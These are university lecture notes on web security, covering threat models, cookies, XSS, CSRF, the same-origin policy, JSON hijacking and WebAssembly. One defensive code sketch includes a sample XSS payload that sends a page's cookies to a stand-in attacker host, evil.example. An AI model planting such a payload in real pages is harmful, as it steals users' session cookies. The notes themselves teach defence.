WebFund 2016W Lecture 22

From Soma-notes

Video

The video for the lecture given on March 31, 2016 is now available.

Notes

In Class

Lecture 22
------------
Web Security

Security in isolated systems
 - no networking

What is the threat model?

Threat model
 - what attacks are you trying to defend against
 - what attacks are you NOT trying to defend against

Computer in an isolated room
 - ignore physical attacks, e.g. sledgehammers

How to compromise this computer?
 - someone bad starts typing
 - someone inserts malicious media/device
   - parking lot flashdrive attack
     (solution: epoxy)
 - electromagnetic emissions
     (live in a faraday cage)

Computer on a network
 - all local attacks
 - attacker can send arbitrary network data to system
 - attacker can listen in on network traffic
 - attacker can change outgoing traffic

Basic defense: network crypto
 - encrypt to hide, sign data to protect integrity,
   verify authenticity

Who will access?
 - authenticated, authorized users
 - unauthorized individuals/systems
 - attackers (can be either of the above)

How can an attacker be "authorized"?
 - social engineering
   (can you please reset my password?)
 - brute force (try all the passwords)
 - technical compromise of credentials (keylogger)
 - authorized user turns/is malicious
   (insider attack)


And now the web

Who can access your application?
 - ANYBODY
 - for public web apps, ANYBODY is an authorized user


So just from this we can see that web security is going
to be hard.

The other half of the nightmare: the browser

Ideally, to secure systems you isolate components
  - build big walls

Your web browser has walls between pages...but there are
BIG HOLES (on purpose)

 - cookies, in particular, are shared
 - this is bad because the scope of cookies is
   determined by DNS (domain name system)

DNS has almost no security
 - there is DNSSEC but nobody uses it, yet at least

You can better protect cookies by using HSTS
 - force HTTPS everywhere on a page/domain
 - protects against mixes of http/https content and
   downgrade attacks

Why do we have cookies in the first place?
 - because HTTP was supposed to be stateless


Also...

Cross-site Scripting (XSS) attacks
 - not necessarily cross-site, not necessarily scripting
 - "web injection attacks"
 - see anywhere attacker can inject content into a page
   - (ads)
   - comments
   - social media
   - "user-generated content"
 - failure to sanitize untrusted input that is inserted
   into a web page
   (adding a comment to a page)
 - otherwise, you can insert arbitrary HTML, CSS,
   and JavaScript into the page
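As a sketch of what "sanitizing untrusted input" means here, the hypothetical escapeHtml helper below (Node/JavaScript, not from the lecture) encodes HTML metacharacters so attacker-supplied text renders as inert text instead of markup:

```javascript
// Minimal sketch of sanitizing untrusted input before inserting it
// into a page. escapeHtml is a hypothetical helper, not a library API.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')   // must be replaced first
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// An attacker-supplied "comment" containing a script:
const comment =
  '<script>new Image().src="http://evil.example/?c="+document.cookie</script>';

// Unsafe would be: '<p>' + comment + '</p>'  (the script executes).
// Escaped, it displays as harmless text:
const safe = '<p>' + escapeHtml(comment) + '</p>';
```

The same idea applies to any sink: escape for the context (HTML body, attribute, URL, etc.) at the point where untrusted data meets the page.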

Cross-site request forgery
 - makes use of cookies automatically being sent
   to domain, no matter where the link came from
 - can be stopped using tokens in URLs, or by checking
   Referer/Origin headers (and a few other ways)

Same-origin policy
 - data should only be loaded from the originating
   server
 - but, you can load almost anything else from
   anywhere
    - images
    - sound
    - javascript

So what about JSON?
 - when you load it with AJAX, you have same origin
   policy
 - but if you just treated it as a script...
 - and what if you were logged in
   - bank sending data as JSON

JSON files are valid JavaScript but they don't specify
the name to give to the data structure
 - so you can't access it, unless

To build an object, you have to call the object's
constructor
 - why not replace the constructor with our own method?
   e.g., override Array
 - this is solved in regular browsers for JSON by
   only using a clean JavaScript environment for
   JSON.parse()
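A small sketch (with a hypothetical payload) of why treating JSON as a script is dangerous while JSON.parse() is safe: eval() executes whatever JavaScript it is given, but JSON.parse() only accepts the JSON grammar and never runs code.

```javascript
// Hypothetical attack payload: looks like JSON, but the "value" is an
// expression that executes code when evaluated as JavaScript.
let attackerRan = false;
const evilPayload =
  '{"balance": (function(){ attackerRan = true; return 0; })()}';

// eval() happily executes it (direct eval shares this scope)...
const viaEval = eval('(' + evilPayload + ')');

// ...while JSON.parse() rejects it with a SyntaxError.
let rejected = false;
try {
  JSON.parse(evilPayload);
} catch (e) {
  rejected = true;
}

// Real JSON parses fine, with no code execution possible.
const account = JSON.parse('{"balance": 100, "owner": "alice"}');
```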

This doesn't help you for code, but who cares about
code, right?
 - many websites dynamically generate JavaScript and put
   personal information into it

Solution?  Don't mix code and data!

WebAssembly
-----------

* Many, many people hate JavaScript
* Lots of code that isn't JavaScript
* But people want everything to run on the web
  in a browser


Past efforts at having alternative languages all
had a basic problem
 - they couldn't see the DOM
 - e.g., Java applets, Flash, Silverlight

And, what about all those other languages?
 - C, C++??!
 - how about games?

Unreal runs in a web page
 - there's WebGL which is pretty fast

So, why can't we compile code and have it run in the
browser?

Two old solutions:
 - NaCl (Google)
 - asm.js (Mozilla)
 
They joined up and are now making WebAssembly

This will be good for functionality and bad for
security.
 - security won't go well because code isn't
   designed for the web
 - but it will be cool to play games in a browser at
   full speed :-)

Student Notes

Administrative

  • There is a study session on April 11 morning.
  • Students can come to tutorial next week and treat it as extended office hours

Web Security

  • There are certain fundamental aspects of the web that make it very hard to secure
  • When considering security, we want to consider a threat model
    • What attacks are you trying to defend against?
    • What attacks are you NOT trying to defend against?
Computer in an isolated room
  • Ignore physical attacks, e.g. sledgehammers
  • If we are talking about the software level, how can the computer be compromised?
    • Someone bad starts typing
    • Someone inserts malicious media/device
    • Parking lot flashdrive attack (a flashdrive is left in a parking lot for someone to pick up and plug in)
    • (solution: epoxy, no one can plug anything in)
    • Electromagnetic emissions
      • (solution: live in a Faraday cage, almost completely isolated from any EM transmission)
Computer on a network
  • Threats:
    • All local attacks (all the physical attacks still apply too)
    • An attacker can send arbitrary network data to system
    • An attacker can listen in on network traffic
    • An attacker can change outgoing traffic
    • (they can listen to anything on the computer and anything going out of it, send arbitrary network data to the computer, and change data leaving the computer for elsewhere)
  • How to protect against that?
  • Basic defense: network crypto
    • Encrypt to hide, sign data to protect integrity, verify authenticity
  • We need to distinguish between who is trying to access the computer
  • Who will access?
    • Authenticated/authorized users
    • Unauthorized individuals/systems
    • Attackers (can be either of the above)
  • How can an attacker be “authorized”?
    • Social engineering (can you please reset my password?)
    • Brute force (try all the passwords)
    • Technical compromise of credentials (keylogger)
    • Authorized user turns/is malicious (insider attack)(most dangerous, because they are not only authorized, they also know the system)
And now the web
  • Why is the web so nasty?
  • Who can access your application?
    • ANYBODY
    • For most public web apps, ANYBODY is an authorized user
    • There are different levels of insider attacks. Just because you have an account on Gmail doesn’t mean you have access to the internal systems. You don’t have full access, but you have some access, and that is potentially dangerous.
  • So from this we can see that web security is going to be hard
  • The other half of the nightmare is the browser
  • Ideally, to secure systems you isolate components
    • Build big walls
  • Your web browser has walls between pages... but there are BIG HOLES (on purpose)
  • The tabs in the browser are not so isolated (e.g. log in to an account in one tab, then refresh another tab on the same site... it will be logged in as well). They are connected.
  • Cookies are being shared between the pages, it is a shared data source
  • This is bad because the scope of cookies is determined by DNS (Domain Name System)
  • DNS has almost no security
  • There is DNSSEC but nobody uses it, yet at least
    • If you want to know more about this, you can find the article on usenix.org
  • You can better protect cookies by using HSTS
    • This forces HTTPS everywhere on a page/domain
    • Protects against mixes of HTTP/HTTPS communications and downgrade attacks
  • Why do we have cookies in the first place?
    • Because HTTP was supposed to be stateless
    • Cookies are used to maintain state between the client and server
  • If we could get past these problems, would we have proper security?
    • Definitely not
  • There are other issues...
Cross-Site Scripting (XSS) Attacks
  • Not necessarily cross-site, and not necessarily scripting
  • More like “web injection attacks”
  • This can happen anywhere an attacker can inject content into a page
    • Ads
    • Comments
    • Social media
    • User-generated content
  • Problems can occur when there is a failure to sanitize untrusted input that is inserted into a web page
    • This allows users to insert arbitrary HTML, CSS, and JavaScript into the page
Cross-Site Request Forgery
  • Cross-site scripting is more straightforward; cross-site request forgery is a little bit weird
  • This involves having a link from a page sent by one server cause a request to be sent off to another server
  • If you are logged in at the other server, this can cause things to happen which you didn't expect or want to happen
    • For example, while logged in to the course wiki, a link from a page on a different website may cause a page to be deleted from the wiki by sending an appropriate request
  • This makes use of cookies automatically being sent to a server, no matter where the link came from
  • How can we stop this?
    • One way is to try to verify where the link came from
    • In the browser tools, go to the network tab and check the Referer header
      • This header indicates where the request came from
    • So in principle, to stop a cross-site request forgery, we can check this header in the requests received on the server
      • If it came from one of our pages, then we can trust the request
      • Otherwise we don’t
    • That does not actually work reliably. It kind of works, but not always
    • Why? Because the Referer header is often stripped by proxies
    • An alternative solution is to randomize your links
    • Instead of using a predictable URL, stick a random string in the middle of it
      • The string is connected to the client's cookie so that the attacker can’t guess it
Same-Origin Policy
  • Data should only be loaded from the originating server, but you can load almost anything else from anywhere
    • Images
    • Sound
    • JavaScript
  • So what about JSON?
    • When you load it with AJAX, you have the same-origin policy
    • But what if you just treated it as a script? (why not just load it in the page?)
    • And what if you were logged in?
      • Consider a bank sending data as JSON (Could another page just grab your bank account data as JSON in the background and see exactly what you have? It doesn’t work.)
  • JSON files are valid JavaScript (JSON is a subset of JavaScript)
  • JSON files do not specify a name to give to the data structure so you can’t access it by name
  • However, to build the object in the first place, its constructor must be called
    • Why not replace the constructor with our own method?
      • e.g., override Array
    • This is solved in regular browsers for JSON by only using a clean JavaScript environment for JSON.parse()
    • But what about code?
      • This doesn’t help you for code, but who cares about code, right?
    • Turns out many websites dynamically generate JavaScript and put personal information into it (different people have different scripts)
      • Solution? Don’t mix code and data! (treat the JSON separately, let the code just be loaded on the system, don’t mix it with anything else)

WebAssembly

  • Many, many people hate JavaScript
    • There is a lot of code that isn’t JavaScript but people want everything to run on the web in a browser (JavaScript is the language of the web)
  • Past efforts at having alternative languages all had a basic problem
    • They couldn’t see the DOM
      • e.g., Java applets, Flash, Silverlight
  • And, what about all those other languages?
  • So why can’t we compile code and have it run in the browser?
  • Two old solutions:
    • PNaCl/NaCl (Google)
      • Portable Native Client (PNaCl) is a sandbox for running compiled C and C++ code in the browser efficiently and securely, independent of the user’s operating system or architecture (e.g. x86 or ARM). (NaCl is more or less the same except it only can be used by extensions/plugins and depends on the user's CPU architecture; you can only use an x86 NaCl app on x86.)
    • asm.js (Mozilla)
      • This uses a compiler that takes arbitrary programs and compiles them to JavaScript
      • asm.js is perfectly legal JavaScript, just a tightly restricted subset
      • You can hardly read asm.js code; it looks almost like binary
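A tiny asm.js-style module makes the "tightly restricted JavaScript" point concrete: the "use asm" pragma and the |0 coercions tell the engine everything is a 32-bit integer, so it can be compiled ahead of time. This is a minimal illustrative sketch, not production asm.js:

```javascript
// A minimal asm.js-style module: still plain JavaScript, but every
// value is coerced to a 32-bit integer with |0, so a JIT can compile
// it without any dynamic-type checks.
function AsmAdder(stdlib) {
  "use asm";
  function add(x, y) {
    x = x | 0;           // declare x as a 32-bit integer
    y = y | 0;           // declare y as a 32-bit integer
    return (x + y) | 0;  // integer addition, result coerced to int
  }
  return { add: add };
}

const adder = AsmAdder(globalThis);
```

Real asm.js output (e.g. from Emscripten) is thousands of lines of this style, which is why it reads like binary.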
  • Google and Mozilla joined up and are now making WebAssembly
    • You can compile arbitrary code to run inside of the browser with WebAssembly
    • This will be good for functionality and bad for security
      • Security won’t go well because the code isn’t designed for the web
      • But it will be cool to play games in a browser at full speed